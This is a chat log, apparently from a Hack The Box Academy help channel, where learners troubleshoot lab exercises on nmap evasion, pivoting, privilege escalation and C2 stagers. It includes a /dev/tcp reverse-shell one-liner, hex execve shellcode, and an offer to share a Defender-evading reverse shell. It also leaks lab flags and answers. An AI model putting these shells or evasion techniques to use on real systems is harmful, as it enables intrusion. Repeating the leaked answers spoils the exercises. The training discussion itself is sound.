1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port10001-TCP:V=7.94SVN%I=7%D=10/11%Time=67093205%P=x86_64-pc-linux-gnu
SF:%r(GetRequest,1F,"220\x20HTB{pr0F7pDv3r510nb4nn3r}\r\n");
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 4.15 - 5.8 (94%), Linux 5.0 - 5.5 (94%), Linux 5.3 - 5.4 (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: NIX-NMAP-EASY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2373.16 seconds
still no required result for OS
could you please take a look?
can you link me to the section you're on? Not sure if I've done this module or not
@x103 ^
ok yeah I don't have access to that module, sorry, not sure I can be of any more specific help than I've already provided. Just other than the suggestion of a sanity check, rip all your options out and start checking them one at a time... You're reducing aggressiveness because the host stops responding (IDS/IPS), no?
yes maybe I can try that, and yes I am reducing aggressiveness due to that
ok any specific reason why you're using an -sS option instead of an -sC?
err, -sV
nvm, just checked the man page
I get those -s"X" options confused all the time
no, nothing specific for -sS, but -sV for a proper version scan for services
yeah it's cool, thank you for the help
--osscan-guess: Guess OS more aggressively
thats from the man page, dunno what "aggressive" means in the IDS/IPS context
likewise, not sure what "Guess" means either
@eternal vigil one thing you can do is add -vv to your nmap scan and it will generate TTLs and you can get a rough estimate of whether your host is a *nix (TTL=128) or Windows (TTL=64) based on the TTL response. This prob doesn't help you much as your exercise prob wants the exact OS and/or version
oh yea that might help, thank you
it is Linux based as the TTL is 63
noice
lmao I brute forced the answer randomly but I NEED TO KNOW how to get to the answer
what is the title of the section?
IDS/IPS evasion lab
Remember, you don't need to provide a version of it. Think about which services can give you information about the operating system. After interviewing the administrators, we found out that they want to prevent neighboring hosts of their /24 subnet mask from communicating with each other.
this was the hint
and as they didn't need a specific version i went for it
can you see solution now that you've solved it?
oh ok, shucks
was the -d decoy option discussed in the section at all?
did you try -d at all?
I tried it in all the scans and I believe you are talking about -D decoy
-d is for debugging and it was not discussed
yeah my bad, I was reading the very small text on the nmap docs page
there are no writeups or official solutions which I can refer to, it's really a bummer ngl
someone should be by shortly who has done the module, when they do would you mind DMing me the solution? I'm genuinely curious "how HTB sees" the solution
oh sure thing, I will DM you the solution if someone replies to me with it
I've just completed the MSSQL, Exchange and SCCM Attacks module.
Can anyone who finished answer a few questions just for the sake of a sanity check, because I think I did it in an unintended way?
Good Morning. I see that for the pathways, it says it should take X amount of days… but that’s assuming how many hours per day? TIA
Depends.... It may take you more time than that or less... Especially in relation to the Skills Assessments...
hey can you please look into my question too if you've got some time? It would be really helpful.
..
sudo nmap 10.129.150.189 -sS -sV --osscan-guess -vv -D RND:3 -T2 -reason --stats-every=10s
this was my last scan
after this I just went ahead and guessed it but I don't think any of this is the right approach
@gilded latch Really depends. You're gonna be doing a lot of research yourself. The less you know the more you have to catch up on. I've been stuck on an optional exercise for SElinux for like three days simply because I want to understand it. It will likely take longer, especially if you want to be thorough.
wifi pentesting module
You know that one port is open from the lab description. You can make a version scan to that one port with Nmap. It won't hit the request limit and you won't be blocked.
You could also grab the banner of that service that you know is running with a cURL command
Module Attacking Authentication Mechanisms, Signature Wrapping Attack, I swear there's something wrong with this module, I do exactly what's asked but I keep getting 'Invalid SAML Response. Not Authenticated.', I take the assertion, remove the signature, update the fields, put it back in the original between response and the original assertion, but to no avail
ohh thank you very much, I will try it later
@quiet trout
So nmap will detect an operating system to a high level of certainty based on a service running on a port? Wish I had access to the module so I could better understand, but it just seems to leave too much up in the air... Or does it spit out a few possibilities and you just try them via process of elimination or look for a banner in a curl request... Glad you mentioned that as I had failed to remember that this is a possibility
also @quiet trout dm
I guess if you run a version scan against a running service it will grab you the banner of that service. It won't necessarily have the information you need.
In this case it does.
I can't remember exactly how I did the module cause it was long ago. But I remember trying to limit my number of requests.
The thing with cURL was just an educated guess due to knowing what port was opened after reading the Lab description and not wanting to get close to the requests limit.
for sure, I often forget about the Server: ... header, revealing some useful info for us. This is pretty handy even if outside the scope and something I hope I don't forget next time an issue like this pops up for me
on the Linux priv esc module for the logrotate section: how did you get it to connect to your attacker box? I tried running both the echo "hi" > access.log and the ./logrotten command, both as a one liner and separately
I don't get a connection
Do them on the same line first off
@fathom pendant I did that like 20 times and got nothing, some guy on a forum said he ran them separately and got it.
Make sure your payload is written properly then
Also you don't need to create a reverse shell with the payload
You can, for example, just cat and read
I've got two payloads, one with a .205/9001 and one with a .205:90011
And output it to a file in home
Also it does take a bit of time sometimes
Also
You need to identify the log file being written to
That's partially why your payload isn't working
Ah nvm checked
Also your images are spoilers
Yes that's a temp log file
As it writes and rewrites
so the logs I'm writing to aren't the correct ones?
You're writing to the correct one
I rechecked before deleting
Actually you were rewriting it
You weren't appending to the log
> is overwrite
>> is append
oh ok I see
Basics of Linux
Hi. I'm in the module "Windows Command Line Introduction". I'm doing the skills assessment. I'm trying to connect with ssh to user3 with a password and it says it's wrong. The thing is that the password of user3 is the answer to the question using user2, which I got correct. Idk what is happening
@fathom pendant I changed the payload to cat the flag and redirect it to a file called flag.txt in my home directory, then changed the > to a >>
now its showing there are two backup folders?
guys I swear I am going mad
the targets can't load for god's sake
any help please
Reach out to support my guy
Try changing vpn regions
how to reach support ?
Need to speak to a person? Learn how to reach our support via HTB Labs.
In Intermediate Network Traffic Analysis > 802.11 Denial-of-Service the following is stated:
"To enforce users to disconnect from our network, and potentially join their network to retrieve information"
Should it not be "To enforce users to disconnect from ***their*** network, and potentially join ***our*** network to retrieve information"? Because the attacker is trying to disconnect users from the legitimate network (theirs) and trick them into joining the malicious network (ours).
Hello everyone! I have some issues with NoSQLi from Skill Assessment II. I've tried so many NoSQL syntaxes but idk what I'm missing....
please state the module name and section name so people can help you more easily
Sorry ! Its Senior Web PenTest - Module Introduction to NoSQL Injection, Skill Assessment II.
https://academy.hackthebox.com/module/67/section/626 UAC bypass wont proc the elevated shell
also the flag is directly available to click on from the desktop no UAC bypass needed
the user shell pops using rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll but after using C:\htb> C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe it doesn't pop a shell at all
you can DM me
Hey, in the pillaging section I found a SAM file but I don't see any hashes inside it
Is anyone open to dm about the skills assessment of attacking auth mechanisms? Can’t really speak without spoilers
Or potential spoilers I guess
Need some help with the File Inclusion Skill Assessment, I found the vulnerable part of the application. I have fuzzed for non-blacklisted, but I am having issues with finding the correct content type. I keep getting "Only Images allowed", any pointers?
Where are you stuck?
Can I dm?
Sure
Look into file signatures
I see the fuzzing command for content type, it says you do it through Burp, but I just tried and it didn't return anything
you can use intruder to fuzz for content type
That's what I'm trying to do rn, but don't understand how to use it through intruder
DM me and show me the steps you have tried so far
file inclusion?
Sorry File Upload
Any clue on finding the cleartext password for an account on the target host in the Windows priv esc Miscellaneous Techniques section?
I found a few creds but none worked
try every method shown
why is there no "answer section" when I do, dig inlanefreight.htb @10.129.160.57
What is the module & section by name? You've got to provide additional context for questions.
footprinting, host based enumeration, the DNS part
I'll fire up the lab. I don't have any notes on that section.
I'm pretty sure it's because dig defaults to querying for A records and there are no A records.
I never really considered your line of questioning before, so I had to play with it a little bit
Try querying for another record type, CNAME. You get the same results, no answer section. But other types of queries will provide an answer section when the server can answer.
Furthermore you get an "authority section" because the DNS server is the authoritative server for that domain. As I understand it at least.
I'm not so sure on that last point, you may get an authority section pointing you to the authoritative servers regardless.
no DNS server on the target network (I believe). Is this the AXFR section? If so you'll need to do a dig AXFR or whatever the cmd is
filter carefully for error messages some are diff than others
setspn.exe is available on systems with the "AD DS role". This is typically just DCs, or is it commonly installed on other systems?
so I'm on web enumeration, I just tried to use whatweb on my Kali VM using the generated IP, but I got a popup on my host machine from my AM saying they blocked a whatweb scanner request. What's going on?
Didn't sound familiar to me. Can you share a screenshot? Maybe there are some details to the message.
I've got a question but I can't type in general chat. Is Kali Purple easy for beginners and can I use it with HTB?
on my vm i got an error that: ERROR Opening: http://83.136.254.158:43226 - Connection reset by peer
and then on my host it says Web Attack: WhatWeb Scanner Request
@shut vapor
I'm just overall confused, I'm connected to the HTB VPN and have a 10.10 IP address, but the IP of the attacking computer was identified as being on my host subnet
See #welcome and follow the instructions to access the whole server. Also you can use any os you'd like.
So it just suggests the connection failed. That target address is public, so it's not accessed through the VPN.
I'm not at my deck so I can't sanity check for you r/n. Can you try through the pwnbox? It's possible something on your end is causing an issue.
is bloodhound's skill assessment just "shortest path from here"?
like
all questions can be solved this way
am i missing something?
tbh BloodHound is all just about shortest path from/to here
it's very useful and it does show a lot of other stuff too with Cyphers etc
Would it be feasible to set up a kind of honeypot trap where you leave a super vulnerable port open (like ssl or something) and setup code that grabs the attacker’s ip and terminates the connection at the last second?
And if not, why? I’m not very knowledgeable about the subject, and am always open to learning more.
not what this channel is about
maybe ask in #blue-team
it is possible, why? You tell us
the idea behind honeypots/nets is usually to let hackers use their tactics in your honeypot to analyze that tactic, so your idea sounds kinda counter intuitive since they wouldn't be allowed to do anything
but it could be useful if you only wanna know who is interested in that service, but it has to be non-common to get something viable ig
ask in #boxes
Hi, in the footprinting module for SMTP, my "resources" button doesn't do anything, and I cannot access them. How can I rectify this?
Thank you, how do I find these in the future?
idk, it's just on the page for me. try hard refreshing your browser cache (ctrl+shift+r) and make sure to disable any adblockers first
Ctrl shift r worked.
Thank you so much. I've been banging my head on this for 6+ hours now. I checked the forums and I had the correct method and everything.
I thought it was supposed to find the correct/create a word list.
You just broke me out of hell. Thank you.
great glad to hear that fixed it, that clears your browser cache so that was probably the problem
Hello! I am on Windows Privilege Escalation Skills Assessment - Part I and I've been trying to get a reverse shell through command injection but none of the shells I create from reverseshell.com would work. I've used both MSFvenom and Reverse PowerShell #1 and #2. Been stuck for the past 2 days and would greatly appreciate any hints. Thanks!
are you url encoding?
No I havent
welp.. are you trying to do it through a web server?
Yes sir. So encoding is a must?
yeah usually you're going to want to url encode things you send to a web server
Gotcha! Thank you!
well, also depends on how you're sending the payload i guess. if you're doing it through the browser i think that already url encodes it, but if you're using burp or something yeah you'll need to url encode
I was sending it through the browser
it's probably your payload then
they just added a Wi-Fi hacking basics module
so it looks like maybe they are adding more wifi stuff
like in a VPS over the Internet
kind of like WiFi netic but with lessons on Academy
like they literally added a WiFi Hacking Basics Module
I wonder why no wifi hacking courses I've seen include hcxdumptools
I would imagine the module will be built upon now that we have a solid base.
I'm sure I'll learn a lot, I got it instantly when I saw it.
Nice 🙂
dang the challenges actually have wifi you can play with that's really nice
I need help answering this question so i can move on. But the Wayback machine is down atm
I found the answer online somewhere else but apparently I literally need to copy and paste it in
no answers require a copy/paste you can just type it in
It doesnt work
then it's not the right answer
no idea what module you're on but i googled it and got a different answer so yours doesn't look right to me
yep not the answer i googled
it'll accept the correct answer so that's probably not it. it doesn't detect if you paste or not, and there's nothing stopping you from putting that in your clipboard and pasting it in, but like i said that doesn't matter.
It's not palm pilot
i don't remember that question and you still didn't say what module or section
idk then, they updated the module, I completed it before the update
Darn
Hi
Password Attacks > Password Attacks Lab - Hard
I got cmd as david and I want to transfer a .vhd file but I can't (Copy-Item : Access is denied)
any ideas ?
access denied sounds like you don't have permissions
yeah but nvm, I got it from FTP Uploads
What is the name of the last modified file in the "/var/backups" directory?
This question does not have the correct answer
it is not ||apt.extended_states.0|| that is one of the more recent ones but not the most recent
correct answer should be ||dpkg.arch.0||
create a post in #1234357888114364508 for any errors with modules
Hello again! Can someone please tell me what payload should I use on Windows Privilege Escalation Skills Assessment - Part I to get a shell? Literally tried everything and nothing seems to be working.
It really feels like the first modules need a do-over, as someone who is repeating most of them
Just remove the filler introduction as well. Bunch of nonsense to waste the readers time
pretty sure I just used a revshell.com payload too, I'd double check your settings
I am running it on Pwnbox
hey guys, I'm very lost on this, would anyone be able to help? Any help would be appreciated, thanks. The section is network services
this is from the passwords attacks module
you probably won't get a response if you don't also include the section
done thanks mate
did you find the user and hash to crack?
Hello, I am very very confused about why my utmp dump is coming back with dates from 1970 and seem to have absolutely nothing to do with the brutus sherlock
what module/section
its a sherlock called brutus
While trying to follow the tutorial on https://academy.hackthebox.com/module/158/section/1426 I set up the dynamic port forwarding, set up the conf file then ran nmap (proxychains nmap -vv -Pn -sT 172.16.5.19) And it shows that all ports are filtered, unlike the example where I am meant to find some port opens. When I try to RDP using the given credential it works as well but it seems that nmap has an issue. Had similar problem with sshuttle, meterpreter etc. Is that a common problem?
There are open ports.. may need to respawn target or wait 5 mins for the environment to fully boot or something
Been a long time since I've hit the HTB... What are the things I need to do to get the omniscient rank in 2024 today?
I think the last rank I hit was pro hacker or something of that sort
In "Network Enumeration with Nmap" / "Evading IDS/IPS - hard lab" - why didn't I get the banner details? ||I intercepted the traffic between the target and attacking host via tcpdump (like shown in the "Service Enumeration" section). After connecting to the target port via nc, it doesn't show the service version number (HTB flag) in the PSH-ACK packet, but it shows the service version number (HTB flag) in nc. So why is the service version not showing in the PSH-ACK packet like it did in the "Service Enumeration" section?||
guys I need a little help: I need to download nmap scan reports located in Pwnbox through an Apache server. I have connected to the academy VPN, yet I am unable to access the Apache server.... I have used this command: sudo service apache2 start --bind <tun0 ip address> or --bind <ens3 ip address>, yet I am unable to access the Apache server, help me out
I waited 10 mins and it is still filtered and no ports are showing up. However I can RDP in it using proxychains + freerdp
hi, I've got a problem transferring the system file from SAM to my attacker host. I'm in the module Password Attacks, Attacking SAM. The first file is ok, but the last isn't working. Already tried to restart/switch VPN and terminate the IP. Ty
upload it another way or use another tool to download it
😬 ok thanks !
if you're using xfreerdp you can mount a local folder on the machine like this /drive:<name>,<path>
Thanks, I'll dig into it!
Hi. I am doing questions during the Linux Fundamentals modules. I am asked What is the path to htb-student's home directory? I put in 'pwd', and it gives me '/home/htb-ac-1526114' but it says it is incorrect. Am I doing something wrong?
the rdp is working too slowly to copy it this way, do you have any other idea ?
you can try the impacket-smbserver and remember to use sudo, cuz if you don't the share drive will not let you write data on it
try adding one more backslash at the end?! Or removing it if you already have one
this is a network problem, use Pwnbox or restart the machine
Didn't work. Thanks anyway
seems like academy API Attacks is down. The webpage is not loading
|| Think htb-student as a username ||
will try pwnbox, ty !
I have the same issue
I worked out that I was using the root flag for the user one
If that helps
hi
If you have access you should be able to evil-winrm and download
You can also use python ftp and powershell
finally the /mount way worked with time, i appreciate a lot all the help you gave me !
it was on my plan too !
Module: File Upload attack
Section: Skill assessment
As seen before, the only place that seems to be a place to 'upload' a file is the ||/contact||, but it seems to be a GET instead of a POST.
I looked at the src code of ||script.js|| in the same dir and I still can't understand where it uploads.
Maybe ||XXE|| or ||XSS|| is the answer? Though I tried both samples and neither seems to work
Furthermore, from that ||script.js|| i learned that it ||accepts 3 extensions only, so I tried the reverse double php.ext thing, while it still said thanks for feed back, it does nothing than that...||
I have noticed while working on the module labs (right now the Password Attacks hard lab) that the target goes offline after a certain time. I spawn the target and use my Kali. Is this expected or is there any way around it? It's kind of annoying when several steps are involved and the shell suddenly drops; it would be nice to be able to keep it alive to complete the lab and not have to redo several steps. This would particularly be applicable further along the line in the course I guess. Thank you for any advice. (So in summary, my question is, how to keep a spawned target alive as long as I want.)
Maybe that button isn’t the answer
Damn I got tunnel visioned again by myself
Wydm? Like the lab is expiring or just stopping randomly
I'm not following - are you saying there is a flag in another Users directory?
Have you looked at the entire picture
Did you get it to work?
Apparently I didn't.
Well I think I am getting it now
well not sure if expiring or dying, but it goes offline. Is that expected that the LAB expires in a certain time?
Yes, usually alive for 90 minutes
You can extend it though
aha, ok, get it, have to remember to extend it when I need to. Do you do that in the same pane, where spawning?
Yeah just have to keep track of it, and yeah it should be right where the spawn button was
I don't remember too well, but I know that there are 2 flags that need to be submitted and I was submitting the wrong one
great, thanks!
Ohk i am come
Ah yes. I got it - Thanks
Vuln Assessment-Nessus Skills Assessment
Can anyone tell me to solve this question how we have to begin?
I cannot understand where we have to start.
there are 2 IPs but I don't know on which we have to start enumeration
just run an authenticated scan as instructed against the target
General question: How does HTTPS help in preventing XSS attacks?
Cookies marked as secure are only transmitted over HTTPS
But in the credentials table, which one do I have to choose?
Not working; I tried this many times.
they gave you the credentials as htb-student and HTB_@cademy_student!
Just select the port/service by the target OS type / open service / open port and redo it.
it helps mitigate, not necessarily prevent
Any help?
did you try doing a UDP scan?
Likely due to timing; this field requires a minimum level of patience, my guy.
also if one technique doesn't work, use others
there's more than one technique showcased in the IDS/IPS reading
once you figure it out it'll click
I mean, I got the flag from the nc, but idk why it didn't show in tcpdump's intercepted PSH-ACK flag?
As I said: timings.
Either way you got the flag; I wouldn't worry too much over it.
Not every technique is gonna work interchangeably.
okay, understandable. Thank you 👍
It's why understanding an array of techniques is important to being successful.
fancy tools a master does not make
yodalee
Or, to rephrase the idiom: a poor carpenter blames his tools.
I captured the intercepted packet in a pcap and analyzed it with Wireshark. Now I can see the banner info in the PSH-ACK flag, thank you.
I'm working on AEN and I'm getting BloodHound info through ldapsearch -> bofhound, but when I try to ingest it in BloodHound it is stuck at 0%.
nxc and bloodhound-python won't do the job, and that's why I'm doing this method instead.
Anyone else had similar problems? I'm using BH 4.3.1.
Hello everyone, I am doing the DCSync section in the Active Directory module. I want to dump the reversible-encryption user's password, but here the file is empty. I have also tried creating new machine instances and also ran it with the -use-vss parameter; it gave an RPC error.
Hi
Not sure what command you ran, but simply using the -just-dc flag with secretsdump showed me the cleartext one.
The same command that was taught in the section
Yeah, I ran that only, but it didn't work.
I got it to work by changing the flag to -just-dc-user Proxyagent; this gave me the cleartext password.
https://academy.hackthebox.com/module/110/section/1056 Can anyone tell me what I'm doing wrong in this section? I capture the request, set my position as the cookie, use the wordlist provided as the payload, and finally set the payload processing to MD5. I run the scan and they all come back as 200 OK, but visiting all of the sites I don't get the flag.
What's the main difference between a staged and stageless msfvenom payload?
Without going into much detail:
stageless = simplest, larger, more complex payload; listens on a raw socket (nc, python, etc.)
staged = more complicated, dropped as an intermediary between the target and a subsequent device which it relies on to receive "the second stage" (the rest of the exploit)
Thanks
I'm not too terribly well versed in it myself, but I think the point of staged is to obfuscate, evade, etc., leave no trace.
For msfvenom it's simply: stageless, the shellcode is in the payload; staged, it gets the shellcode from your msf handler.
shellcode?
Code responsible for getting you a shell.
Oh okay. So the staged payload calls back to the handler to get the shellcode (for example sh -i >& /dev/tcp/10.10.10.10/1234 0>&1)?
"Using the metasploit framework" goes into detail about this
I've been through the module before, it's just been a long time and I wanted to confirm my understanding. Thanks!
Uhh, the idea is there, but shellcodes are not commands; they're simple machine code for the sole purpose of, in your case, getting a shell.
Oh, okay. Noted. Thanks!
What's that website full of shellcodes? Gosh darn it, memory is failing me at the moment; certainly you've seen it.
revshells.com? Those are commands to create a shell though, not shellcodes.
Gosh, it's not in my bookmarks, I done fucked up. It was a good link; it was a bunch of known exploits/CVEs with shellcode payloads and variations for each.
I think it was for use in Metasploit specifically.
Exploit-DB?
Ah yes, the shellcodes section of Exploit-DB.
thx @old oasis
Well, I think this is it; the site's page has changed considerably since I last viewed it.
Yeah this is it
@normal sand - have ChatGPT decode this for you... classic shellcode \x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 creates a shell on the target system.
That's short and sweet; some familiarity with C and asm (very little) is needed to understand it.
Hello, guys! I really need your help.
Module: Pivoting, Tunneling, and Port Forwarding: Skill assessment.
Task 4: Use the information you gathered to pivot to the discovered host. Submit the contents of C:\Flag.txt as the answer.
First, I tried dynamic SSH port forwarding. I performed dynamic port forwarding with "ssh -D 9050 -i id_rsa webadmin@10.129.x.x" and made sure that the port is open on my local host via netstat -tuln. Then I made sure that my proxychains.conf is configured correctly and I have "socks4 127.0.0.1 9050" there. But when I tried to enumerate the internal host 172.16.5.35 using "proxychains nmap 172.16.5.35 -Pn -sT", it showed me that there is not a single open port.
After that, I tried to do it with the "Show Solution" from Hack The Box; they did it with Meterpreter, so I copied every command completely. I also tried to use the ping_sweep module using the Meterpreter session, and it worked and showed me an internal host. But when I configured the SOCKS proxy, added routes, and then tried to use "proxychains nmap 172.16.5.35 -Pn -sT", it showed me again that no port was open.
What do I need to do?
nmap has its own SOCKS proxy argument that might be worth trying. If you go searching the web for problems with proxychains and nmap, you'll find a few people discussing the issue. I can't say for sure nmap's proxy settings resolve the issue because I haven't gone back to try yet. When proxychains was misbehaving I moved to get a meterpreter session going like you did and then ligolo after that worked well too.
Love to know if nmap's option works better though.
Okay, thanks, will try now.
Module: Windows Privilege Escalation
Section: User Account Control
Link to section: https://academy.hackthebox.com/module/67/section/626
I've followed the steps exactly and I was able to get a test connection when I ran just the DLL.
However, when I attempt to run C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe, I do not get a connection. The dll is stored at C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll.
Excellent point. Also (and I'm not sure if this comes into play here with proxychains) you might see about exporting proxy env vars for a session.
For example, I need to do this when proxying Burp through the terminal:
```
export http_proxy=localhost:8080
export https_proxy=localhost:8080
```
@worldly badger ^
reply fail @shut vapor ^
Good point. I think you're saying a lot of the system looks to the environ to know if it should use a proxy.
I realized that the problem is not with nmap itself, but probably with proxychains, because I cannot execute a simple "proxychains ping 172.16.5.35".
When I try to execute the same command using a meterpreter session directly from the pivot host, everything is fine and ping requests are executed properly.
I tried to use "export ALL_PROXY=socks4://127.0.0.1:9050" also, but it didn't work. The problem is still not solved
Well, ICMP or UDP won't go through proxychains, only TCP. So the -Pn command will force nmap to scan but the results still come out wacky.
Just use ligolo-ng.
I'd fire up the lab to play with it if I weren't elsewhere rn.
Yeah, ligolo works real well. I mean, I want to get it working myself because having the option could be useful someday.
And also I'm a little insane when it comes to making computers do what I want or understanding why they won't.
Here are some config priorities for proxychains (I've never used this so I can't be of too much help here):
```
ProxyChains looks for the configuration file in the following order:
- SOCKS5 proxy port in environment variable ${PROXYCHAINS_SOCKS5},
- file listed in environment variable ${PROXYCHAINS_CONF_FILE},
- the -f argument provided to the proxychains command,
- ./proxychains.conf,
- $(HOME_DIRECTORY)/.proxychains/proxychains.conf,
- and finally, /etc/proxychains.conf.
```
Found this on: https://medium.com/swlh/proxying-like-a-pro-cccdc177b081
Huh, ok, proxychains actually seems to be behaving for me now.
||```
proxychains nmap -sT --top-ports 100 172.16.5.35 -Pn
```||
If you're still struggling with it you can DM me and we'll go over where you are / what you've done.
Hi. I'm in the module "Windows Command Line Introduction". I'm doing the skills assessment. I'm trying to connect with SSH to user3 with a password and it says it's wrong. The thing is that the password of user3 is the answer to the question using user2, which I got correct. Idk what is happening.
Can you link to the section? I think I've done this one and it's a little confusing, like you mentioned.
Ok yeah, it wants the flag you find by identifying the hostname of user 2.
Oh wait, nvm.
Are you putting in the password in all caps? Copy/paste?
Yes, but I use the answer of user2 to identify user 3 and it doesn't work. I tried copy/paste.
DM me the pass you're using?
My answer was all caps, but maybe that's just how I put it in.
Sounds like you've got it sorted though.
It is solved. Thanks man.
Good module! Felt nice to revisit stuff I haven't done in a while!
https://academy.hackthebox.com/achievement/799850/222
In today's digital age, wireless networks are ubiquitous, connecting countless devices in homes, businesses, and public spaces. With this widespread connectivity comes an increased risk of security vulnerabilities that can be exploited by malicious actors. As such, understanding and securing Wi-Fi networks has become a crucial aspect of cybersec...
It worked on my 2nd VM, Parrot OS, but isn't working on my Kali machine. Any ideas why this can happen?
I solved this. The solution was to use sudo before proxychains.
Thank you all, and especially @shut vapor, for your help.
By mistake I clicked on the Gold subscribe button while I have an active Student subscription, and it instantly canceled my subscription.
What should i do now
Contact support on the website. They will get back to you asap
Need some help? Learn how to reach the support team on Academy.
Using Web Proxies -> ZAP Scanner: every time I run an active scan I find a different high-level vulnerability, and sometimes the scan doesn't find any high-level vulnerability.
Anyone know what the issue here is?
Are you supposed to use it for the target? This method has been fixed.
Yeah, it's the method I have to use on the target. Running just the DLL gave me a connection, but running SystemPropertiesAdvanced.exe didn't give a connection.
I tried placing the DLL in the current directory, as well as the directory I mentioned in my initial message.
Help guys.
Windows Privilege Escalation : Print Operators
Follow the steps in this section to escalate privileges to SYSTEM, and submit the contents of the flag.txt file on administrator's Desktop. Necessary tools for both methods can be found in the C:\Tools directory, or you can practice compiling and uploading them on your own.
I uploaded the .cpp file, but cl.exe is not found. Why?
Also, what do you mean by "fixed"?
Oh, you were referring to it being fixed in Windows 10 19H1 (18362).
The target is on Windows 10 (14393).
Help pls.
cl.exe is used for Visual Studio compiling; you won't find it in the tools folder.
How can I run the .cpp file then?
Compile it?
Just use the compiled version.
Did you mean .exe?
Hi guys, I'm stuck at the Getting Started knowledge check. I can't log in to the admin account despite acquiring the credentials in the users.xml. What could I be doing wrong? Best regards, JG.
Alrighty, I'll check out another method I guess. Thanks.
Just use ligolo.
Thx for the suggestion, writing this down. The user was dealing with a proxychains module and couldn't figure out if he had the configs right (it ended up being a missing sudo). I'm gonna have to remember this though in the future; maybe I'll just use this instead when I encounter the modules for proxychains.
Yeah, appreciate you trying to help, but ligolo is super helpful; it makes pivoting like running nmap.
I haven't encountered a proxychains module yet. What, uh... what's the point of that in the context of labs? OPSEC and evasion?
Yeah ligolo is great and really stable
You can use pretty much any heavy service through it, no problem.
None of those; it lets you discover a whole new network (you will understand the concepts after reading the module).
Interesting, I look forward to checking it out, then using ligolo 😛
Yeah, I did the skill assessment with the tools presented then with ligolo the next day
I don't know why, but I just tried it again, and it worked 
Maybe it had to do something with me running just the DLL first.
Guys, I am stuck in the Information Gathering module skill assessment.
What is the API key in the hidden admin directory that you have discovered on the target system?
How to solve this one?
Did you brute force to find subdomains or vhost?
By using gobuster?
Yep.
In this case I should bruteforce the subdomain, right?
Using ffuf?
In this case I have used Gobuster to search for subdomains or vhosts for inlanefreight.
Also remember that if you enter the IP address with the port indicated in the lab and the browser does not resolve it, it is because virtual hosting is being used, and you must add the vhost to the /etc/hosts file to avoid DNS resolution.
Hey, I have a question: if I have finished a module on Academy Silver, then when my subscription expires, can I still go back and look over the material? Or what happens if I start a module, my sub expires and I don't finish it? Can I still go back and finish it, or do I need to spend cubes?
Any modules that you have 100% completed are yours forever, including updates.
Anyone working on Wi-Fi Penetration Testing Basics?
I'm trying to solve the airdecap-ng questions, but my Wireshark is not opening the files for analysis.
Skills Assessment - Using Web Proxies: does the /lucky.php button work randomly, or am I making a mistake somewhere?
What files are you trying to open? Just double-click on /opt/decrypt.cap and it'll auto-open in Wireshark.
The .cap is opening, but when I generate the -dec.cap it opens but does not show any info.
Then you are decrypting in the wrong way.
When you decrypt do you see "Number of decrypted WPA packets"? It should be greater than zero.
Yeap.
No it's not.
You are removing wireless headers from the file. Which usually requires unencrypted capture files.
Please go through the section again to see how to decrypt the WPA file.
Still the same output.
Run it on /opt/decrypt.cap as asked in question. Just checked and it's working fine on my end.
Sorry for the confusion. Just noticed I do have to go through that path.
Solved, thanks @tribal plinth.
In the Password Attacks module, Protected Archives section, I'm having a hard time. I found Notes.zip, I made an upload server on my target machine, and then downloaded it from my attack machine. But it's saying the zip isn't recognized as a zip, "out of bounds", weird shit. Idk what I'm doing wrong truthfully lol.
This module is a really tough one for me
When I use gobuster dir, is it basically just taking the text file, appending a line to the target URL and making a header curl request to it to see if there's a response?
Hello there, trying to log in to HTB but I keep getting a network error.
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt
gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt
Those are two examples
Yeah, I know how to use it; I meant, like, what is gobuster doing under the hood?
Ahh gotcha, dunno.
Is this through SSH?
I did create a wpa_supplicant configuration file with the correct PSK (Pre-Shared Key) and SSID in both scenarios, WEP and WPA, but I'm still getting an error.
Yeah.
Sliver Module
https://academy.hackthebox.com/module/241/section/2637
generate stager IP:PORT --format csharp --save /home/kali/HTB/Sliver/stage_content.txt
Why does it compile and build the payload?
In the module it says that you just do this to take the bytes from it and put them into the reverse ASPX msfvenom payload...
Can u help?
You can try scp to transfer the file
Wym, why does it compile?
Why does this not work:
```
Error: unknown flag: --lhost
```
You sure that’s the flag?
Yeah, even the other guy in general (his name is jinn) said he used that command.
But I think I downloaded a newer version of this Sliver C2.
Can u explain?
I'm pretty sure it just uses msfvenom to make the stager.
I just used windows/x64/shell/reverse_tcp
Works the same
And then u took those bytes and put them into the stager payload?
Yeah
Wow, thanks dude, I'm gonna try it.
Btw, after this module do u use Sliver a lot?
Or is it not good?
Just got it a few days ago and been redoing the ad, pivoting, and AEN with it
That's great. Btw, I tried to use the C2 in the AD module, but for some reason I couldn't get a connection. Maybe it needs some obfuscation or bypassing?
Not sure, but ik I had to disable AV on one of the pivoting machines though.
Oh okay.
Btw, if u want I can msg u a working rev shell that bypasses current Defender; maybe u can use it in ur studies.
I sent it if u want it
Probably won’t work by the time I need it but sure😂
Yeah bro, we gotta find more evasions. All the time it's updated and we can't evade anymore.
But maybe I'm gonna do the Windows Evasion module to learn manual evasion techniques.
Do exactly what the module tells.
I got it, thank you buddy!
Just don't use Metasploit 😂
Did u do the evasion module?
Did the evasion module help u to manually evade Defender during engagements and boxes? And pivoting?
It teaches you more how to modify code so it is not detected... But in the end, with boxes, you just go with compiled stuff that normally doesn't get detected.
And at the top of my head, I can just remember Freelancer having Defender on.
Yeah, but I am more so interested in the real world, and when I get a real job I don't want to be stuck just because of Defender or some bad AV.
